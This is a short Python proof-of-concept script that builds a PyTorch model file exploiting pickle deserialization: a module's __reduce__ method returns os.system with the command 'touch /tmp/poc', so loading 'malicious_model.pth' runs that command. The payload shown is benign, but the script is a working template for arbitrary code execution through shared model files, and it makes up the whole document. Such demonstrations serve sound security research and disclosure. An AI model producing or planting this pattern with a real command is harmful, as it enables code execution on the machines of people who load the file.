import torch
import os
class OverwriteFile(torch.nn.Module):
def __reduce__(self):
# This payload causes os.system to run the command when deserialized.
return (os.system, ("touch /tmp/poc",))
# Create and save the malicious model.
malicious_model = OverwriteFile()
torch.save(malicious_model, "malicious_model.pth")